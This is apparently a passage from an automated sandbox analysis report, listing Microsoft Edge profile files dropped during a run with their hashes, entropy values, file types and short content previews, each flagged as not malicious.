                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\da8e41fd-c5a0-48f5-b2b4-11bb3122d511.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\fec301c7-4dda-43f2-bb51-dd3f7e4c5006.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):111
                                                                                                                                                                                                                                                                              Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                              MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                              SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                              SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                              SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):80
                                                                                                                                                                                                                                                                              Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                              MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                              SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                              SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                              SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):428
                                                                                                                                                                                                                                                                              Entropy (8bit):5.202482967480862
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:RvcM+vLZYebvqBZFUt86QEJ/+6dcMV54ZYebvqBaJ:VcdlYebvyg88dc2oYebvL
                                                                                                                                                                                                                                                                              MD5:D0ADD5F2D1E853C4CBA60AD03B13D278
                                                                                                                                                                                                                                                                              SHA1:2B077ECB176EFD861C20D533ACB86DE10EECAC80
                                                                                                                                                                                                                                                                              SHA-256:6AEF105DD968AF2F33043B7577C5ADD7BD9623EB4D6CA02FE0DC65F3924D40E7
                                                                                                                                                                                                                                                                              SHA-512:72A90804345A9B1563B3B816CC8B0E2A111E6F9F34F7C8D705617E8F301B03DC077BADAB4DDBC223CED3C4F8266B2D29C014C4E37A1EC1B66796337F8CE7E142
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:31.611 1f8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/20-02:42:31.613 1f8c Recovering log #3.2024/12/20-02:42:31.617 1f8c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):428
                                                                                                                                                                                                                                                                              Entropy (8bit):5.202482967480862
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:RvcM+vLZYebvqBZFUt86QEJ/+6dcMV54ZYebvqBaJ:VcdlYebvyg88dc2oYebvL
                                                                                                                                                                                                                                                                              MD5:D0ADD5F2D1E853C4CBA60AD03B13D278
                                                                                                                                                                                                                                                                              SHA1:2B077ECB176EFD861C20D533ACB86DE10EECAC80
                                                                                                                                                                                                                                                                              SHA-256:6AEF105DD968AF2F33043B7577C5ADD7BD9623EB4D6CA02FE0DC65F3924D40E7
                                                                                                                                                                                                                                                                              SHA-512:72A90804345A9B1563B3B816CC8B0E2A111E6F9F34F7C8D705617E8F301B03DC077BADAB4DDBC223CED3C4F8266B2D29C014C4E37A1EC1B66796337F8CE7E142
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:31.611 1f8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/20-02:42:31.613 1f8c Recovering log #3.2024/12/20-02:42:31.617 1f8c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):331
                                                                                                                                                                                                                                                                              Entropy (8bit):5.157030042486625
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfx6jyq2PcNwi23oH+TcwtpIFUt8IXfxx81Zmw+IXfx91RkwOcNwi23oH+Tcwt7:RCyvLZYebmFUt860/+691R54ZYebaUJ
                                                                                                                                                                                                                                                                              MD5:1488C6385CD5279B493AAAD8043D3678
                                                                                                                                                                                                                                                                              SHA1:BE53E10EB8A9F04356D9F1C158502F6ED6412727
                                                                                                                                                                                                                                                                              SHA-256:E88F4C5755ADE5F18059579223552CBD8264AE5FD98997707586BEA704D9BE12
                                                                                                                                                                                                                                                                              SHA-512:A1FA3B65D6F65818AA500AAD90C40F01D922950608B2A167D28C52A4E794FC3F0DEF5C5C37424743D8217A6E161C71AA7EAA188E9295B30CAE53BA8741484B41
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:12.669 4e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/20-02:42:12.674 4e4 Recovering log #3.2024/12/20-02:42:12.682 4e4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):331
                                                                                                                                                                                                                                                                              Entropy (8bit):5.157030042486625
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfx6jyq2PcNwi23oH+TcwtpIFUt8IXfxx81Zmw+IXfx91RkwOcNwi23oH+Tcwt7:RCyvLZYebmFUt860/+691R54ZYebaUJ
                                                                                                                                                                                                                                                                              MD5:1488C6385CD5279B493AAAD8043D3678
                                                                                                                                                                                                                                                                              SHA1:BE53E10EB8A9F04356D9F1C158502F6ED6412727
                                                                                                                                                                                                                                                                              SHA-256:E88F4C5755ADE5F18059579223552CBD8264AE5FD98997707586BEA704D9BE12
                                                                                                                                                                                                                                                                              SHA-512:A1FA3B65D6F65818AA500AAD90C40F01D922950608B2A167D28C52A4E794FC3F0DEF5C5C37424743D8217A6E161C71AA7EAA188E9295B30CAE53BA8741484B41
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:12.669 4e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/20-02:42:12.674 4e4 Recovering log #3.2024/12/20-02:42:12.682 4e4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):196608
                                                                                                                                                                                                                                                                              Entropy (8bit):1.265412664866743
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:KrJ/2qOB1nxCkMWSAELyKOMq+8HKkjucswRv8p3nVum8:K0q+n0JW9ELyKOMq+8HKkjuczRv894
                                                                                                                                                                                                                                                                              MD5:82F001CC76E2292FDE843BBEB1818D50
                                                                                                                                                                                                                                                                              SHA1:CC7726E0FF5759FA7ADD298DEFB2E92AB2119E2A
                                                                                                                                                                                                                                                                              SHA-256:5EC2B9101FCC9046C56BD9ADC05811E2367F98DFE3652132B65F37B80EEBBAD4
                                                                                                                                                                                                                                                                              SHA-512:AF1A9468FE607FE703BFBF31F58C3A949F43BC08D477F855227B186881E7EA60403DA345B6DD44E2D6D08C961B6CABD8609BD6D6E8141F647F1EDA449C72E63E
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                                                                                                              Entropy (8bit):0.466503496752501
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0jhU:v7doKsKuKZKlZNmu46yjx0i
                                                                                                                                                                                                                                                                              MD5:D0F725A53FBF05E883877603B7BB8B76
                                                                                                                                                                                                                                                                              SHA1:E23216F9E22CFFACD00CAACA11D35B8E05F5919E
                                                                                                                                                                                                                                                                              SHA-256:56D6F9DA0DCC88BB0E74C4D10FCF954F2A4FEA74FE292F2BF224A5F088EC8B95
                                                                                                                                                                                                                                                                              SHA-512:E964DE8D8D2D4D68D94A882C6C70B1EAC481D53C93627D85D166760F1ED9DC40C95C890FD7A59FB7412CB71A0001AAF7FFB01014542DCB424C4DF5A3A9538C28
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):11755
                                                                                                                                                                                                                                                                              Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                              MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                              SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                              SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                              SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\d08c0325-b36c-4259-8ced-64d5f7f9d3b7.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (17550), with no line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):17554
                                                                                                                                                                                                                                                                              Entropy (8bit):5.492037500755213
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:st0J99QTryDiuabatSuypNspFyaNPWc+ktaNNPhACnNWcVCUD913nho68WbV+FeC:st0PGQSu4NspFtJWzVCU/nbGkQwFFM
                                                                                                                                                                                                                                                                              MD5:16622B86FF23E54350A7844C65515E2C
                                                                                                                                                                                                                                                                              SHA1:1AD17EF3076CCCAF2A6E3C84D070D5611817DE16
                                                                                                                                                                                                                                                                              SHA-256:6A781519CBD2E13B9179AEE78E5EADC1CB3008F2613773E76A3C53E2EBD2E82D
                                                                                                                                                                                                                                                                              SHA-512:4E91AFA52142CA8C1FFBDB3D356AB12E74594B734140CB54E58456D5455DB594EB8A7A5F2BFFDC31AE554A8377E5DD445B6D8606DF1546D8366B29B8F1709D14
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379154133170644","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):115717
                                                                                                                                                                                                                                                                              Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                              MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                              SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                              SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                              SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):28672
                                                                                                                                                                                                                                                                              Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                              MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                              SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                              SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                              SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\dfbf77e8-760c-4f5a-af97-f05d39bd381a.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):40504
                                                                                                                                                                                                                                                                              Entropy (8bit):5.561330373188603
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:768:O55ill7pLGLhaUWPxZfMI8F1+UoAYDCx9Tuqh0VfUC9xbog/OVoG8DP/8rw8xkbO:O55ilzchaUWPxZfMIu1jaNG8D/18x0k1
                                                                                                                                                                                                                                                                              MD5:299629EFB5ECBBCFCA54A671541391B7
                                                                                                                                                                                                                                                                              SHA1:AE43F40388CFA9C543981BCF56382C47EADC733F
                                                                                                                                                                                                                                                                              SHA-256:F2FAF535782305101B2D94FD2779CADF529911E53589AC35C2931E37942F577C
                                                                                                                                                                                                                                                                              SHA-512:A06E072DB7852B7251CBD1894F6E764C1E5ABA1571A0363AE068B1F4E8921A3FF99583794127C5EE42482983FE91648058185178B939C250C3901E2D527C90F6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379154132664972","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379154132664972","location":5,"ma

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e7bde4d1-8ca7-41c3-9997-11bd21d0e6de.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (17385), with no line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):17389
                                                                                                                                                                                                                                                                              Entropy (8bit):5.495192700995294
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:st0J99QTryDiuabatSuypNspFyaNPWc+ktaNNPhACnNWcVCUD913nho68WbV+Fer:st0PGQSu4NspFtJWzVCU/nbGkQwQM
                                                                                                                                                                                                                                                                              MD5:9D28479D0522BB32B41E621C4AB6027D
                                                                                                                                                                                                                                                                              SHA1:49C1F34AE2669748EAB9F981AEDEBEAB271E27A6
                                                                                                                                                                                                                                                                              SHA-256:7CE4DFBE09CA399C0F28017197DD9C8CAC7662BE9C67CC3C546F94A4D87CD6BD
                                                                                                                                                                                                                                                                              SHA-512:AB59E82FB5E03B11D1516238D2EA0450007FEDB1D7224FA894F408DE207606F7625B98B06C8ABA3FC955C139996546F7B118A360B3D156E316BD0646FC1ED20C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379154133170644","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                              Entropy (8bit):0.10296568495427846
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:+FxFt3FxgspEjVl/PnnnnnnnnnnnvoQ/Eou:+XFt3XFoPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                                              MD5:F2D4CA4BCEC046BB3810F6092816DDE1
                                                                                                                                                                                                                                                                              SHA1:3CBC255B81747BB0DE83E79CC9A57E199DF0F764
                                                                                                                                                                                                                                                                              SHA-256:753773058109B540A36BA2D9B401F03572A23B7808C7ACC740A48C3E2EC89C0B
